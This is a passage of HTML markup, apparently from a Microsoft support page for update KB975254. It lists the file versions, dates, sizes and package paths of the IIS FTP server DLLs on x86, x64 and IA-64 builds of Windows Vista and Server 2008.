class=\"sbody-strong\">xxx</strong></td><td class=\"sbody-td\">Windows Vista SP1 and Windows Server 2008 SP1</td><td class=\"sbody-td\">SP1</td><td class=\"sbody-td\">LDR</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">6.0.600<span class=\"text-base\">2</span>.<span class=\"text-base\">18</span><strong class=\"sbody-strong\">xxx</strong></td><td class=\"sbody-td\">Windows Vista SP2 and Windows Server 2008 SP2</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">GDR</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">6.0.600<span class=\"text-base\">2</span>.<span class=\"text-base\">22</span><strong class=\"sbody-strong\">xxx</strong></td><td class=\"sbody-td\">Windows Vista SP2 and Windows Server 2008 SP2</td><td class=\"sbody-td\">SP2</td><td class=\"sbody-td\">LDR</td></tr></table></div></li><li>Service Pack 1 is integrated into the release version of Windows Server 2008. Therefore, RTM milestone files apply only to Windows Vista. RTM milestone files have a 6.0.0000.<strong class=\"sbody-strong\">xxxxxx</strong> version number.</li><li>GDR service branches contain only those fixes that are widely released to address widespread, critical issues. LDR service branches contain hotfixes in addition to widely released fixes.</li></ul><h4 class=\"sbody-h4\">For all supported x86-based versions of Windows Vista and Windows Server 2008</h4><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><th class=\"sbody-th\">File Name</th><th class=\"sbody-th\">Version</th><th class=\"sbody-th\">Date</th><th class=\"sbody-th\">Time</th><th class=\"sbody-th\">Size</th><th class=\"sbody-th\">Service branch</th></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ftpctrs2.dll</td><td class=\"sbody-td\">7.0.6000.16923</td><td class=\"sbody-td\">07-Sep-2009</td><td class=\"sbody-td\">14:49</td><td class=\"sbody-td\">10,752</td><td class=\"sbody-td\">Windows6.0-KB975254-x86\\x86_microsoft-windows-iis-ftpserver_31bf3856ad364e35_6.0.6000.16923_none_fb568ad2c062613e</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ftpmib.dll</td><td class=\"sbody-td\">7.0.6000.16923</td><td class=\"sbody-td\">07-Sep-2009</td><td class=\"sbody-td\">14:49</td><td class=\"sbody-td\">8,192</td><td class=\"sbody-td\">Windows6.0-KB975254-x86\\x86_microsoft-windows-iis-ftpserver_31bf3856ad364e35_6.0.6000.16923_none_fb568ad2c062613e</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ftpsvc2.dll</td><td class=\"sbody-td\">7.0.6000.16923</td><td class=\"sbody-td\">07-Sep-2009</td><td class=\"sbody-td\">14:49</td><td class=\"sbody-td\">169,472</td><td class=\"sbody-td\">Windows6.0-KB975254-x86\\x86_microsoft-windows-iis-ftpserver_31bf3856ad364e35_6.0.6000.16923_none_fb568ad2c062613e</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ftpctrs2.dll</td><td class=\"sbody-td\">7.0.6000.21123</td><td class=\"sbody-td\">07-Sep-2009</td><td class=\"sbody-td\">12:22</td><td class=\"sbody-td\">10,752</td><td class=\"sbody-td\">Windows6.0-KB975254-x86\\x86_microsoft-windows-iis-ftpserver_31bf3856ad364e35_6.0.6000.21123_none_fbdfffbfd980344a</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ftpmib.dll</td><td class=\"sbody-td\">7.0.6000.21123</td><td class=\"sbody-td\">07-Sep-2009</td><td class=\"sbody-td\">12:22</td><td class=\"sbody-td\">8,192</td><td class=\"sbody-td\">Windows6.0-KB975254-x86\\x86_microsoft-windows-iis-ftpserver_31bf3856ad364e35_6.0.6000.21123_none_fbdfffbfd980344a</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ftpsvc2.dll</td><td class=\"sbody-td\">7.0.6000.21123</td><td class=\"sbody-td\">07-Sep-2009</td><td class=\"sbody-td\">12:22</td><td class=\"sbody-td\">169,472</td><td class=\"sbody-td\">Windows6.0-KB975254-x86\\x86_microsoft-windows-iis-ftpserver_31bf3856ad364e35_6.0.6000.21123_none_fbdfffbfd980344a</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ftpctrs2.dll</td><td class=\"sbody-td\">7.0.6000.16386</td><td class=\"sbody-td\">02-Nov-2006</td><td class=\"sbody-td\">09:46</td><td class=\"sbody-td\">10,752</td><td class=\"sbody-td\">Windows6.0-KB975254-x86\\x86_microsoft-windows-iis-ftpserver_31bf3856ad364e35_6.0.6001.18327_none_fd40caa0bd85578b</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ftpmib.dll</td><td class=\"sbody-td\">7.0.6000.16386</td><td class=\"sbody-td\">02-Nov-2006</td><td class=\"sbody-td\">09:46</td><td class=\"sbody-td\">8,192</td><td class=\"sbody-td\">Windows6.0-KB975254-x86\\x86_microsoft-windows-iis-ftpserver_31bf3856ad364e35_6.0.6001.18327_none_fd40caa0bd85578b</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ftpsvc2.dll</td><td class=\"sbody-td\">7.0.6001.18327</td><td class=\"sbody-td\">07-Sep-2009</td><td class=\"sbody-td\">12:05</td><td class=\"sbody-td\">167,936</td><td class=\"sbody-td\">Windows6.0-KB975254-x86\\x86_microsoft-windows-iis-ftpserver_31bf3856ad364e35_6.0.6001.18327_none_fd40caa0bd85578b</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ftpctrs2.dll</td><td class=\"sbody-td\">7.0.6001.22516</td><td class=\"sbody-td\">07-Sep-2009</td><td class=\"sbody-td\">11:53</td><td class=\"sbody-td\">10,752</td><td class=\"sbody-td\">Windows6.0-KB975254-x86\\x86_microsoft-windows-iis-ftpserver_31bf3856ad364e35_6.0.6001.22516_none_fdd438f3d69bbf34</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ftpmib.dll</td><td class=\"sbody-td\">7.0.6001.22516</td><td class=\"sbody-td\">07-Sep-2009</td><td class=\"sbody-td\">11:53</td><td class=\"sbody-td\">8,192</td><td class=\"sbody-td\">Windows6.0-KB975254-x86\\x86_microsoft-windows-iis-ftpserver_31bf3856ad364e35_6.0.6001.22516_none_fdd438f3d69bbf34</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ftpsvc2.dll</td><td class=\"sbody-td\">7.0.6001.22516</td><td class=\"sbody-td\">07-Sep-2009</td><td class=\"sbody-td\">11:53</td><td class=\"sbody-td\">167,936</td><td class=\"sbody-td\">Windows6.0-KB975254-x86\\x86_microsoft-windows-iis-ftpserver_31bf3856ad364e35_6.0.6001.22516_none_fdd438f3d69bbf34</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ftpctrs2.dll</td><td class=\"sbody-td\">7.0.6000.16386</td><td class=\"sbody-td\">02-Nov-2006</td><td class=\"sbody-td\">09:46</td><td class=\"sbody-td\">10,752</td><td class=\"sbody-td\">Windows6.0-KB975254-x86\\x86_microsoft-windows-iis-ftpserver_31bf3856ad364e35_6.0.6002.18107_none_ff3cde46ba9b71f4</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ftpmib.dll</td><td class=\"sbody-td\">7.0.6000.16386</td><td class=\"sbody-td\">02-Nov-2006</td><td class=\"sbody-td\">09:46</td><td class=\"sbody-td\">8,192</td><td class=\"sbody-td\">Windows6.0-KB975254-x86\\x86_microsoft-windows-iis-ftpserver_31bf3856ad364e35_6.0.6002.18107_none_ff3cde46ba9b71f4</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ftpsvc2.dll</td><td class=\"sbody-td\">7.0.6002.18107</td><td class=\"sbody-td\">07-Sep-2009</td><td class=\"sbody-td\">09:50</td><td class=\"sbody-td\">167,936</td><td class=\"sbody-td\">Windows6.0-KB975254-x86\\x86_microsoft-windows-iis-ftpserver_31bf3856ad364e35_6.0.6002.18107_none_ff3cde46ba9b71f4</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ftpctrs2.dll</td><td class=\"sbody-td\">7.0.6002.22219</td><td class=\"sbody-td\">07-Sep-2009</td><td class=\"sbody-td\">10:01</td><td class=\"sbody-td\">10,752</td><td class=\"sbody-td\">Windows6.0-KB975254-x86\\x86_microsoft-windows-iis-ftpserver_31bf3856ad364e35_6.0.6002.22219_none_ffbdabb9d3bf605d</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ftpmib.dll</td><td class=\"sbody-td\">7.0.6002.22219</td><td class=\"sbody-td\">07-Sep-2009</td><td class=\"sbody-td\">10:01</td><td class=\"sbody-td\">8,192</td><td class=\"sbody-td\">Windows6.0-KB975254-x86\\x86_microsoft-windows-iis-ftpserver_31bf3856ad364e35_6.0.6002.22219_none_ffbdabb9d3bf605d</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ftpsvc2.dll</td><td class=\"sbody-td\">7.0.6002.22219</td><td class=\"sbody-td\">07-Sep-2009</td><td class=\"sbody-td\">10:01</td><td class=\"sbody-td\">167,936</td><td class=\"sbody-td\">Windows6.0-KB975254-x86\\x86_microsoft-windows-iis-ftpserver_31bf3856ad364e35_6.0.6002.22219_none_ffbdabb9d3bf605d</td></tr></table></div><h4 class=\"sbody-h4\">For all supported x64-based versions of Windows Vista and Windows Server 2008</h4><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><th class=\"sbody-th\">File Name</th><th class=\"sbody-th\">Version</th><th class=\"sbody-th\">Date</th><th class=\"sbody-th\">Time</th><th class=\"sbody-th\">Size</th><th class=\"sbody-th\">CPU</th><th class=\"sbody-th\">Service branch</th></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ftpctrs2.dll</td><td class=\"sbody-td\">7.0.6000.16923</td><td class=\"sbody-td\">07-Sep-2009</td><td class=\"sbody-td\">12:51</td><td class=\"sbody-td\">12,800</td><td class=\"sbody-td\">X64</td><td class=\"sbody-td\">Windows6.0-KB975254-x64\\amd64_microsoft-windows-iis-ftpserver_31bf3856ad364e35_6.0.6000.16923_none_5775265678bfd274</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ftpmib.dll</td><td class=\"sbody-td\">7.0.6000.16923</td><td class=\"sbody-td\">07-Sep-2009</td><td class=\"sbody-td\">12:51</td><td class=\"sbody-td\">10,752</td><td class=\"sbody-td\">X64</td><td class=\"sbody-td\">Windows6.0-KB975254-x64\\amd64_microsoft-windows-iis-ftpserver_31bf3856ad364e35_6.0.6000.16923_none_5775265678bfd274</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ftpsvc2.dll</td><td class=\"sbody-td\">7.0.6000.16923</td><td class=\"sbody-td\">07-Sep-2009</td><td class=\"sbody-td\">12:51</td><td class=\"sbody-td\">196,096</td><td class=\"sbody-td\">X64</td><td class=\"sbody-td\">Windows6.0-KB975254-x64\\amd64_microsoft-windows-iis-ftpserver_31bf3856ad364e35_6.0.6000.16923_none_5775265678bfd274</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ftpctrs2.dll</td><td class=\"sbody-td\">7.0.6000.21123</td><td class=\"sbody-td\">07-Sep-2009</td><td class=\"sbody-td\">13:03</td><td class=\"sbody-td\">12,800</td><td class=\"sbody-td\">X64</td><td class=\"sbody-td\">Windows6.0-KB975254-x64\\amd64_microsoft-windows-iis-ftpserver_31bf3856ad364e35_6.0.6000.21123_none_57fe9b4391dda580</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ftpmib.dll</td><td class=\"sbody-td\">7.0.6000.21123</td><td class=\"sbody-td\">07-Sep-2009</td><td class=\"sbody-td\">13:03</td><td class=\"sbody-td\">10,752</td><td class=\"sbody-td\">X64</td><td class=\"sbody-td\">Windows6.0-KB975254-x64\\amd64_microsoft-windows-iis-ftpserver_31bf3856ad364e35_6.0.6000.21123_none_57fe9b4391dda580</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ftpsvc2.dll</td><td class=\"sbody-td\">7.0.6000.21123</td><td class=\"sbody-td\">07-Sep-2009</td><td class=\"sbody-td\">13:03</td><td class=\"sbody-td\">196,096</td><td class=\"sbody-td\">X64</td><td class=\"sbody-td\">Windows6.0-KB975254-x64\\amd64_microsoft-windows-iis-ftpserver_31bf3856ad364e35_6.0.6000.21123_none_57fe9b4391dda580</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ftpctrs2.dll</td><td class=\"sbody-td\">7.0.6001.18327</td><td class=\"sbody-td\">07-Sep-2009</td><td class=\"sbody-td\">12:46</td><td class=\"sbody-td\">12,800</td><td class=\"sbody-td\">X64</td><td class=\"sbody-td\">Windows6.0-KB975254-x64\\amd64_microsoft-windows-iis-ftpserver_31bf3856ad364e35_6.0.6001.18327_none_595f662475e2c8c1</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ftpmib.dll</td><td class=\"sbody-td\">7.0.6001.18327</td><td class=\"sbody-td\">07-Sep-2009</td><td class=\"sbody-td\">12:46</td><td class=\"sbody-td\">10,752</td><td class=\"sbody-td\">X64</td><td class=\"sbody-td\">Windows6.0-KB975254-x64\\amd64_microsoft-windows-iis-ftpserver_31bf3856ad364e35_6.0.6001.18327_none_595f662475e2c8c1</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ftpsvc2.dll</td><td class=\"sbody-td\">7.0.6001.18327</td><td class=\"sbody-td\">07-Sep-2009</td><td class=\"sbody-td\">12:46</td><td class=\"sbody-td\">191,488</td><td class=\"sbody-td\">X64</td><td class=\"sbody-td\">Windows6.0-KB975254-x64\\amd64_microsoft-windows-iis-ftpserver_31bf3856ad364e35_6.0.6001.18327_none_595f662475e2c8c1</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ftpctrs2.dll</td><td class=\"sbody-td\">7.0.6001.22516</td><td class=\"sbody-td\">07-Sep-2009</td><td class=\"sbody-td\">12:12</td><td class=\"sbody-td\">12,800</td><td class=\"sbody-td\">X64</td><td class=\"sbody-td\">Windows6.0-KB975254-x64\\amd64_microsoft-windows-iis-ftpserver_31bf3856ad364e35_6.0.6001.22516_none_59f2d4778ef9306a</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ftpmib.dll</td><td class=\"sbody-td\">7.0.6001.22516</td><td class=\"sbody-td\">07-Sep-2009</td><td class=\"sbody-td\">12:12</td><td class=\"sbody-td\">10,752</td><td class=\"sbody-td\">X64</td><td class=\"sbody-td\">Windows6.0-KB975254-x64\\amd64_microsoft-windows-iis-ftpserver_31bf3856ad364e35_6.0.6001.22516_none_59f2d4778ef9306a</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ftpsvc2.dll</td><td class=\"sbody-td\">7.0.6001.22516</td><td class=\"sbody-td\">07-Sep-2009</td><td class=\"sbody-td\">12:12</td><td class=\"sbody-td\">191,488</td><td class=\"sbody-td\">X64</td><td class=\"sbody-td\">Windows6.0-KB975254-x64\\amd64_microsoft-windows-iis-ftpserver_31bf3856ad364e35_6.0.6001.22516_none_59f2d4778ef9306a</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ftpctrs2.dll</td><td class=\"sbody-td\">7.0.6002.18107</td><td class=\"sbody-td\">07-Sep-2009</td><td class=\"sbody-td\">11:50</td><td class=\"sbody-td\">12,800</td><td class=\"sbody-td\">X64</td><td class=\"sbody-td\">Windows6.0-KB975254-x64\\amd64_microsoft-windows-iis-ftpserver_31bf3856ad364e35_6.0.6002.18107_none_5b5b79ca72f8e32a</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ftpmib.dll</td><td class=\"sbody-td\">7.0.6002.18107</td><td class=\"sbody-td\">07-Sep-2009</td><td class=\"sbody-td\">11:50</td><td class=\"sbody-td\">10,752</td><td class=\"sbody-td\">X64</td><td class=\"sbody-td\">Windows6.0-KB975254-x64\\amd64_microsoft-windows-iis-ftpserver_31bf3856ad364e35_6.0.6002.18107_none_5b5b79ca72f8e32a</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ftpsvc2.dll</td><td class=\"sbody-td\">7.0.6002.18107</td><td class=\"sbody-td\">07-Sep-2009</td><td class=\"sbody-td\">11:50</td><td class=\"sbody-td\">191,488</td><td class=\"sbody-td\">X64</td><td class=\"sbody-td\">Windows6.0-KB975254-x64\\amd64_microsoft-windows-iis-ftpserver_31bf3856ad364e35_6.0.6002.18107_none_5b5b79ca72f8e32a</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ftpctrs2.dll</td><td class=\"sbody-td\">7.0.6002.22219</td><td class=\"sbody-td\">07-Sep-2009</td><td class=\"sbody-td\">11:47</td><td class=\"sbody-td\">12,800</td><td class=\"sbody-td\">X64</td><td class=\"sbody-td\">Windows6.0-KB975254-x64\\amd64_microsoft-windows-iis-ftpserver_31bf3856ad364e35_6.0.6002.22219_none_5bdc473d8c1cd193</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ftpmib.dll</td><td class=\"sbody-td\">7.0.6002.22219</td><td class=\"sbody-td\">07-Sep-2009</td><td class=\"sbody-td\">11:47</td><td class=\"sbody-td\">10,752</td><td class=\"sbody-td\">X64</td><td class=\"sbody-td\">Windows6.0-KB975254-x64\\amd64_microsoft-windows-iis-ftpserver_31bf3856ad364e35_6.0.6002.22219_none_5bdc473d8c1cd193</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ftpsvc2.dll</td><td class=\"sbody-td\">7.0.6002.22219</td><td class=\"sbody-td\">07-Sep-2009</td><td class=\"sbody-td\">11:47</td><td class=\"sbody-td\">191,488</td><td class=\"sbody-td\">X64</td><td class=\"sbody-td\">Windows6.0-KB975254-x64\\amd64_microsoft-windows-iis-ftpserver_31bf3856ad364e35_6.0.6002.22219_none_5bdc473d8c1cd193</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ftpctrs2.dll</td><td class=\"sbody-td\">7.0.6000.16923</td><td class=\"sbody-td\">07-Sep-2009</td><td class=\"sbody-td\">14:49</td><td class=\"sbody-td\">10,752</td><td class=\"sbody-td\">X86</td><td class=\"sbody-td\">Windows6.0-KB975254-x64\\wow64_microsoft-windows-iis-ftpserver_31bf3856ad364e35_6.0.6000.16923_none_61c9d0a8ad20946f</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ftpmib.dll</td><td class=\"sbody-td\">7.0.6000.16923</td><td class=\"sbody-td\">07-Sep-2009</td><td class=\"sbody-td\">14:49</td><td class=\"sbody-td\">8,192</td><td class=\"sbody-td\">X86</td><td class=\"sbody-td\">Windows6.0-KB975254-x64\\wow64_microsoft-windows-iis-ftpserver_31bf3856ad364e35_6.0.6000.16923_none_61c9d0a8ad20946f</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ftpsvc2.dll</td><td class=\"sbody-td\">7.0.6000.16923</td><td class=\"sbody-td\">07-Sep-2009</td><td class=\"sbody-td\">14:49</td><td class=\"sbody-td\">169,472</td><td class=\"sbody-td\">X86</td><td class=\"sbody-td\">Windows6.0-KB975254-x64\\wow64_microsoft-windows-iis-ftpserver_31bf3856ad364e35_6.0.6000.16923_none_61c9d0a8ad20946f</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ftpctrs2.dll</td><td class=\"sbody-td\">7.0.6000.21123</td><td class=\"sbody-td\">07-Sep-2009</td><td class=\"sbody-td\">12:22</td><td class=\"sbody-td\">10,752</td><td class=\"sbody-td\">X86</td><td class=\"sbody-td\">Windows6.0-KB975254-x64\\wow64_microsoft-windows-iis-ftpserver_31bf3856ad364e35_6.0.6000.21123_none_62534595c63e677b</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ftpmib.dll</td><td class=\"sbody-td\">7.0.6000.21123</td><td class=\"sbody-td\">07-Sep-2009</td><td class=\"sbody-td\">12:22</td><td class=\"sbody-td\">8,192</td><td class=\"sbody-td\">X86</td><td class=\"sbody-td\">Windows6.0-KB975254-x64\\wow64_microsoft-windows-iis-ftpserver_31bf3856ad364e35_6.0.6000.21123_none_62534595c63e677b</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ftpsvc2.dll</td><td class=\"sbody-td\">7.0.6000.21123</td><td class=\"sbody-td\">07-Sep-2009</td><td class=\"sbody-td\">12:22</td><td class=\"sbody-td\">169,472</td><td class=\"sbody-td\">X86</td><td class=\"sbody-td\">Windows6.0-KB975254-x64\\wow64_microsoft-windows-iis-ftpserver_31bf3856ad364e35_6.0.6000.21123_none_62534595c63e677b</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ftpctrs2.dll</td><td class=\"sbody-td\">7.0.6000.16386</td><td class=\"sbody-td\">02-Nov-2006</td><td class=\"sbody-td\">09:46</td><td class=\"sbody-td\">10,752</td><td class=\"sbody-td\">X86</td><td class=\"sbody-td\">Windows6.0-KB975254-x64\\wow64_microsoft-windows-iis-ftpserver_31bf3856ad364e35_6.0.6001.18327_none_63b41076aa438abc</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ftpmib.dll</td><td class=\"sbody-td\">7.0.6000.16386</td><td class=\"sbody-td\">02-Nov-2006</td><td class=\"sbody-td\">09:46</td><td class=\"sbody-td\">8,192</td><td class=\"sbody-td\">X86</td><td class=\"sbody-td\">Windows6.0-KB975254-x64\\wow64_microsoft-windows-iis-ftpserver_31bf3856ad364e35_6.0.6001.18327_none_63b41076aa438abc</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ftpsvc2.dll</td><td class=\"sbody-td\">7.0.6001.18327</td><td class=\"sbody-td\">07-Sep-2009</td><td class=\"sbody-td\">12:05</td><td class=\"sbody-td\">167,936</td><td class=\"sbody-td\">X86</td><td class=\"sbody-td\">Windows6.0-KB975254-x64\\wow64_microsoft-windows-iis-ftpserver_31bf3856ad364e35_6.0.6001.18327_none_63b41076aa438abc</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ftpctrs2.dll</td><td class=\"sbody-td\">7.0.6001.22516</td><td class=\"sbody-td\">07-Sep-2009</td><td class=\"sbody-td\">11:53</td><td class=\"sbody-td\">10,752</td><td class=\"sbody-td\">X86</td><td class=\"sbody-td\">Windows6.0-KB975254-x64\\wow64_microsoft-windows-iis-ftpserver_31bf3856ad364e35_6.0.6001.22516_none_64477ec9c359f265</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ftpmib.dll</td><td class=\"sbody-td\">7.0.6001.22516</td><td class=\"sbody-td\">07-Sep-2009</td><td class=\"sbody-td\">11:53</td><td class=\"sbody-td\">8,192</td><td class=\"sbody-td\">X86</td><td class=\"sbody-td\">Windows6.0-KB975254-x64\\wow64_microsoft-windows-iis-ftpserver_31bf3856ad364e35_6.0.6001.22516_none_64477ec9c359f265</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ftpsvc2.dll</td><td class=\"sbody-td\">7.0.6001.22516</td><td class=\"sbody-td\">07-Sep-2009</td><td class=\"sbody-td\">11:53</td><td class=\"sbody-td\">167,936</td><td class=\"sbody-td\">X86</td><td class=\"sbody-td\">Windows6.0-KB975254-x64\\wow64_microsoft-windows-iis-ftpserver_31bf3856ad364e35_6.0.6001.22516_none_64477ec9c359f265</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ftpctrs2.dll</td><td class=\"sbody-td\">7.0.6000.16386</td><td class=\"sbody-td\">02-Nov-2006</td><td class=\"sbody-td\">09:46</td><td class=\"sbody-td\">10,752</td><td class=\"sbody-td\">X86</td><td class=\"sbody-td\">Windows6.0-KB975254-x64\\wow64_microsoft-windows-iis-ftpserver_31bf3856ad364e35_6.0.6002.18107_none_65b0241ca759a525</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ftpmib.dll</td><td class=\"sbody-td\">7.0.6000.16386</td><td class=\"sbody-td\">02-Nov-2006</td><td class=\"sbody-td\">09:46</td><td class=\"sbody-td\">8,192</td><td class=\"sbody-td\">X86</td><td class=\"sbody-td\">Windows6.0-KB975254-x64\\wow64_microsoft-windows-iis-ftpserver_31bf3856ad364e35_6.0.6002.18107_none_65b0241ca759a525</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ftpsvc2.dll</td><td class=\"sbody-td\">7.0.6002.18107</td><td class=\"sbody-td\">07-Sep-2009</td><td class=\"sbody-td\">09:50</td><td class=\"sbody-td\">167,936</td><td class=\"sbody-td\">X86</td><td class=\"sbody-td\">Windows6.0-KB975254-x64\\wow64_microsoft-windows-iis-ftpserver_31bf3856ad364e35_6.0.6002.18107_none_65b0241ca759a525</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ftpctrs2.dll</td><td class=\"sbody-td\">7.0.6002.22219</td><td class=\"sbody-td\">07-Sep-2009</td><td class=\"sbody-td\">10:01</td><td class=\"sbody-td\">10,752</td><td class=\"sbody-td\">X86</td><td class=\"sbody-td\">Windows6.0-KB975254-x64\\wow64_microsoft-windows-iis-ftpserver_31bf3856ad364e35_6.0.6002.22219_none_6630f18fc07d938e</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ftpmib.dll</td><td class=\"sbody-td\">7.0.6002.22219</td><td class=\"sbody-td\">07-Sep-2009</td><td class=\"sbody-td\">10:01</td><td class=\"sbody-td\">8,192</td><td class=\"sbody-td\">X86</td><td class=\"sbody-td\">Windows6.0-KB975254-x64\\wow64_microsoft-windows-iis-ftpserver_31bf3856ad364e35_6.0.6002.22219_none_6630f18fc07d938e</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ftpsvc2.dll</td><td class=\"sbody-td\">7.0.6002.22219</td><td class=\"sbody-td\">07-Sep-2009</td><td class=\"sbody-td\">10:01</td><td class=\"sbody-td\">167,936</td><td class=\"sbody-td\">X86</td><td class=\"sbody-td\">Windows6.0-KB975254-x64\\wow64_microsoft-windows-iis-ftpserver_31bf3856ad364e35_6.0.6002.22219_none_6630f18fc07d938e</td></tr></table></div><h4 class=\"sbody-h4\">For all supported IA-64-based versions of Windows Server 2008</h4><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><th class=\"sbody-th\">File Name</th><th class=\"sbody-th\">Version</th><th class=\"sbody-th\">Date</th><th class=\"sbody-th\">Time</th><th class=\"sbody-th\">Size</th><th class=\"sbody-th\">CPU</th><th class=\"sbody-th\">Service branch</th></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ftpctrs2.dll</td><td class=\"sbody-td\">7.0.6001.18000</td><td class=\"sbody-td\">19-Jan-2008</td><td class=\"sbody-td\">09:27</td><td class=\"sbody-td\">25,600</td><td class=\"sbody-td\">IA-64</td><td class=\"sbody-td\">Windows6.0-KB975254-ia64\\ia64_microsoft-windows-iis-ftpserver_31bf3856ad364e35_6.0.6001.18327_none_fd426e96bd836087</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ftpmib.dll</td><td class=\"sbody-td\">7.0.6001.18000</td><td class=\"sbody-td\">19-Jan-2008</td><td class=\"sbody-td\">09:27</td><td class=\"sbody-td\">17,408</td><td class=\"sbody-td\">IA-64</td><td class=\"sbody-td\">Windows6.0-KB975254-ia64\\ia64_microsoft-windows-iis-ftpserver_31bf3856ad364e35_6.0.6001.18327_none_fd426e96bd836087</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ftpsvc2.dll</td><td class=\"sbody-td\">7.0.6001.18327</td><td class=\"sbody-td\">07-Sep-2009</td><td class=\"sbody-td\">12:26</td><td class=\"sbody-td\">409,600</td><td class=\"sbody-td\">IA-64</td><td class=\"sbody-td\">Windows6.0-KB975254-ia64\\ia64_microsoft-windows-iis-ftpserver_31bf3856ad364e35_6.0.6001.18327_none_fd426e96bd836087</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ftpctrs2.dll</td><td class=\"sbody-td\">7.0.6001.22516</td><td class=\"sbody-td\">07-Sep-2009</td><td class=\"sbody-td\">12:24</td><td class=\"sbody-td\">25,600</td><td class=\"sbody-td\">IA-64</td><td class=\"sbody-td\">Windows6.0-KB975254-ia64\\ia64_microsoft-windows-iis-ftpserver_31bf3856ad364e35_6.0.6001.22516_none_fdd5dce9d699c830</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ftpmib.dll</td><td class=\"sbody-td\">7.0.6001.22516</td><td class=\"sbody-td\">07-Sep-2009</td><td class=\"sbody-td\">12:24</td><td class=\"sbody-td\">17,408</td><td class=\"sbody-td\">IA-64</td><td class=\"sbody-td\">Windows6.0-KB975254-ia64\\ia64_microsoft-windows-iis-ftpserver_31bf3856ad364e35_6.0.6001.22516_none_fdd5dce9d699c830</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ftpsvc2.dll</td><td class=\"sbody-td\">7.0.6001.22516</td><td class=\"sbody-td\">07-Sep-2009</td><td class=\"sbody-td\">12:24</td><td class=\"sbody-td\">409,600</td><td class=\"sbody-td\">IA-64</td><td class=\"sbody-td\">Windows6.0-KB975254-ia64\\ia64_microsoft-windows-iis-ftpserver_31bf3856ad364e35_6.0.6001.22516_none_fdd5dce9d699c830</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ftpctrs2.dll</td><td class=\"sbody-td\">7.0.6001.18000</td><td class=\"sbody-td\">19-Jan-2008</td><td class=\"sbody-td\">09:27</td><td class=\"sbody-td\">25,600</td><td class=\"sbody-td\">IA-64</td><td class=\"sbody-td\">Windows6.0-KB975254-ia64\\ia64_microsoft-windows-iis-ftpserver_31bf3856ad364e35_6.0.6002.18107_none_ff3e823cba997af0</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ftpmib.dll</td><td class=\"sbody-td\">7.0.6001.18000</td><td class=\"sbody-td\">19-Jan-2008</td><td class=\"sbody-td\">09:27</td><td class=\"sbody-td\">17,408</td><td class=\"sbody-td\">IA-64</td><td 